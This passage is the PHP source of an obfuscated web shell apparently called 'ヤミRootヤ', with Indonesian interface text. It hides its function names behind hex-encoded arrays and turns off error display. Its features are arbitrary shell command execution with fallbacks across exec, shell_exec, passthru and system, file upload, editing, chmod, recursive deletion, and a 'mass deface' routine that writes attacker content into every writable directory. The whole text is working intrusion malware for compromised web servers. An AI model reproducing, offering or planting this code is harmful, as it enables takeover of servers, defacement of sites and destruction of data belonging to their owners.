$v) { $f[$k] = hex2bin($v); } unset($k, $v); $f[0](0); $f[1](); @$f[2]('output_buffering', 0); @$f[2]('display_errors', 0); $f[2]('memory_limit', '256M'); $f[3]('Content-Type: text/html; charset=UTF-8'); $f[4](); // --- CONFIG --- $title = "ヤミRootヤ"; $author = "0x6ick"; $theme_bg = "black"; $theme_fg = "#00FFFF"; $theme_highlight = "#00FFD1"; $theme_link = "#00FFFF"; $theme_link_hover = "#FFFFFF"; $theme_border_color = "#00FFFF"; $theme_table_header_bg = "#191919"; $theme_table_row_hover = "#333333"; $theme_input_bg = "black"; $theme_input_fg = "#00FFFF"; $font_family = "'Kelly Slab', cursive"; $message_success_color = "#00CCFF"; $message_error_color = "red"; // --- FUNCTIONS --- function sanitizeFilename($filename) { global $f; return $f[5]($filename); } function exe($cmd) { global $f; if ($f[6]('exec')) { $f[7]($cmd . ' 2>&1', $output); return $f[8]("\n", $output); } elseif ($f[6]('shell_exec')) { return $f[9]($cmd); } elseif ($f[6]('passthru')) { $f[11](); $f[10]($cmd); return $f[12](); } elseif ($f[6]('system')) { $f[11](); $f[13]($cmd); return $f[12](); } return "Command execution disabled."; } function perms($file){ global $f; $perms = @$f[14]($file); if ($perms === false) return '????'; if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; elseif (($perms & 0x2000) == 0x2000) $info = 'c'; elseif (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function delete_recursive($target) { global $f; if (!$f[16]($target)) return true; if (!$f[17]($target)) return $f[18]($target); foreach ($f[19]($target) as $item) { if ($item == '.' || $item == '..') continue; if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false; } return $f[20]($target); } function zip_add_folder($zip, $folder, $base_path_length) { global $f; $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $file) { if (!$file->isDir()) { $file_path = $file->getRealPath(); $relative_path = $f[21]($file_path, $base_path_length); $zip->addFile($file_path, $relative_path); } } } function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') { global $path, $f; $redirect_path = !empty($current_path) ? $current_path : $path; $params = ['path' => $redirect_path]; if ($msg_type) $params['msg_type'] = $msg_type; if ($msg_text) $params['msg_text'] = $msg_text; $f[3]("Location: ?" . $f[22]($params)); exit(); } // --- INITIAL SETUP & PATH --- $path = $f[23](isset($_GET['path']) ? $_GET['path'] : $f[24]()); $path = $f[25]('\\','/',$path); // --- HANDLERS FOR ACTIONS THAT REDIRECT --- if(isset($_POST['start_mass_deface'])) { $mass_deface_results = ''; function mass_deface_recursive($dir, $file, $content, &$res) { global $f; if(!$f[26]($dir)) {$res .= "[FAILED] ".$f[28]($dir)." (Not Writable)
"; return;} foreach($f[19]($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if($f[17]($lokasi)) { if($f[26]($lokasi)) { $f[27]($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[DONE] ".$f[28]($lokasi.DIRECTORY_SEPARATOR.$file)."
"; mass_deface_recursive($lokasi, $file, $content, $res); } else { $res .= "[FAILED] ".$f[28]($lokasi)." (Not Writable)
"; } } } } function mass_deface_flat($dir, $file, $content, &$res) { global $f; if(!$f[26]($dir)) {$res .= "[FAILED] ".$f[28]($dir)." (Not Writable)
"; return;} foreach($f[19]($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if($f[17]($lokasi) && $f[26]($lokasi)) { $f[27]($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[DONE] ".$f[28]($lokasi.DIRECTORY_SEPARATOR.$file)."
"; } } } if($_POST['tipe_sabun'] == 'mahal') mass_deface_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); else mass_deface_flat($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); $_SESSION['feature_output'] = $mass_deface_results; redirect_with_message('success', 'Mass Deface Selesai!', $path); } if(isset($_FILES['file_upload'])){ $file_name = sanitizeFilename($_FILES['file_upload']['name']); if($f[29]($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)) redirect_with_message('success', 'UPLOAD SUCCESS: ' . $file_name, $path); else redirect_with_message('error', 'File Gagal Diupload !!', $path); } // MODIFIED: Bulk action handler logic if (isset($_POST['bulk_action']) && isset($_POST['selected_files'])) { $action = $_POST['bulk_action']; $selected_files = $_POST['selected_files']; // Handle Zip Action if ($action === 'zip_selected' && $f[30]('ZipArchive')) { $zip_filename = 'archive_' . $f[31]('Y-m-d_H-i-s') . '.zip'; $zip_filepath = $path . DIRECTORY_SEPARATOR . $zip_filename; $zip = new ZipArchive(); if ($zip->open($zip_filepath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { foreach ($selected_files as $file) { $file_path = $f[23]($file); if ($f[43]($file_path)) $zip->addFile($file_path, $f[5]($file_path)); elseif ($f[17]($file_path)) zip_add_folder($zip, $file_path, $f[33]($f[32]($file_path) . DIRECTORY_SEPARATOR)); } $zip->close(); redirect_with_message('success', 'File berhasil di-zip ke: ' . $zip_filename, $path); } else { redirect_with_message('error', 'Gagal membuat file zip!', $path); } } // ADDED: Handle Delete Action elseif ($action === 'delete_selected') { foreach ($selected_files as $file_to_delete) { delete_recursive($file_to_delete); } redirect_with_message('success', 'Item yang dipilih berhasil dihapus.', $path); } } if(isset($_GET['option']) && isset($_POST['opt_action'])){ $target_full_path = $_POST['path_target']; $action = $_POST['opt_action']; $current_dir = $f[23](isset($_GET['path']) ? $_GET['path'] : $f[24]()); switch ($action) { case 'delete': if (delete_recursive($target_full_path)) redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir); else redirect_with_message('error', 'Gagal menghapus! Periksa izin.', $current_dir); break; case 'chmod_save': if($f[34]($target_full_path, $f[35]($_POST['perm_value']))) redirect_with_message('success', 'CHMOD SUCCESS !!', $current_dir); else redirect_with_message('error', 'CHMOD Gagal !!', $current_dir); break; case 'rename_save': $new_full_path = $f[32]($target_full_path).'/'.sanitizeFilename($_POST['new_name_value']); if($f[36]($target_full_path, $new_full_path)) redirect_with_message('success', 'RENAME SUCCESS !!', $current_dir); else redirect_with_message('error', 'RENAME Gagal !!', $current_dir); break; case 'edit_save': if($f[26]($target_full_path)) { if($f[27]($target_full_path, $_POST['src_content'])) redirect_with_message('success', 'EDIT SUCCESS !!', $current_dir); else redirect_with_message('error', 'Edit File Gagal !!', $current_dir); } else { redirect_with_message('error', 'File tidak writable!', $current_dir); } break; case 'extract_save': if ($f[30]('ZipArchive')) { $zip = new ZipArchive; if ($zip->open($target_full_path) === TRUE) { $zip->extractTo($current_dir); $zip->close(); redirect_with_message('success', 'File berhasil diekstrak!', $current_dir); } else { redirect_with_message('error', 'Gagal membuka file zip!', $current_dir); } } else { redirect_with_message('error', 'Class ZipArchive tidak ditemukan!', $current_dir); } break; } } if(isset($_GET['create_new'])) { $target_path_new = $path . '/' . sanitizeFilename($_POST['create_name']); if ($_POST['create_type'] == 'file') { if (@$f[27]($target_path_new, '') !== false) redirect_with_message('success', 'File Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat file baru!', $path); } elseif ($_POST['create_type'] == 'dir') { if (@$f[37]($target_path_new)) redirect_with_message('success', 'Folder Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat folder baru!', $path); } } ?> <?php echo $f[28]($title); ?>

".$f[28]($_GET['msg_text']).""; } if(isset($_SESSION['feature_output'])) { echo '

Hasil Fitur Sebelumnya:

'.$_SESSION['feature_output'].'
'; unset($_SESSION['feature_output']); } ?>
User / IP :
Host / Server :
System :
: /'; $current_built_path = ''; foreach($paths_array as $pat){ if(empty($pat)) continue; $current_built_path .= '/' . $pat; echo ''.$f[28]($pat).'/'; } ?>
'; switch ($_GET['action']) { case 'cmd': $cmd_output = (isset($_POST['do_cmd'])) ? $f[28](exe($_POST['cmd_input'])) : ''; echo '

Execute Command

'; if($cmd_output) echo '

Output:

'.$cmd_output.'
'; break; case 'upload_form': echo '

Upload File

'; break; case 'mass_deface_form': echo '

Mass Deface

Tipe:
Biasa (1 level) | Massal (Rekursif)

Folder Target:

Nama File:

Isi Script:

'; break; case 'create_form': echo '

Create New

'; break; case 'delete': echo '

Konfirmasi Hapus: '.$f[28]($f[5]($_GET['target_file'])).'

Anda YAKIN? Tindakan ini tidak bisa dibatalkan.

BATAL
'; break; case 'extract_form': echo '

Konfirmasi Ekstrak: '.$f[28]($f[5]($_GET['target_file'])).'

Ekstrak semua isi file ini ke direktori saat ini ('.$f[28]($path).')?

BATAL
'; break; case 'view_file': echo '

Viewing: '.$f[28]($f[5]($_GET['target_file'])).'

'; break; case 'edit_form': echo '

Editing: '.$f[28]($f[5]($_GET['target_file'])).'


'; break; case 'rename_form': echo '

Rename: '.$f[28]($f[5]($_GET['target_file'])).'

New Name:
'; break; case 'chmod_form': $current_perms = $f[21]($f[15]('%o', @$f[14]($_GET['target_file'])), -4); echo '

Chmod: '.$f[28]($f[5]($_GET['target_file'])).'

Permission:
'; break; } echo ''; } if ($show_file_list) { echo '
'; echo '
'; echo ''; echo ''; $scandir_items = @$f[19]($path); if ($scandir_items) { $f[47]($scandir_items, function($a, $b) use ($path, $f) { if ($a == '..') return -1; if ($b == '..') return 1; if ($f[17]($path.'/'.$a) && !$f[17]($path.'/'.$b)) return -1; if (!$f[17]($path.'/'.$a) && $f[17]($path.'/'.$b)) return 1; return $f[48]($a, $b); }); foreach($scandir_items as $item){ if($item == '.') continue; $full_item_path = $path.DIRECTORY_SEPARATOR.$item; $encoded_full_item_path = $f[38]($full_item_path); echo ""; echo ""; echo ""; } } else { echo ""; } // MODIFIED: Bulk action dropdown if ($f[30]('ZipArchive')) { echo ''; // ADDED: delete_selected option } echo '
NameSizePermOptions
"; if ($item != '..') echo ""; echo ""; if($item == '..') echo " ".$f[28]($item).""; elseif($f[17]($full_item_path)) echo " ".$f[28]($item).""; else echo " ".$f[28]($item).""; echo "".($f[43]($full_item_path) ? $f[44](@$f[45]($full_item_path)/1024,2).' KB' : '--')."".perms($full_item_path)."
Gagal membaca direktori.
With selected:
'; } ?>
Coded With 💗 by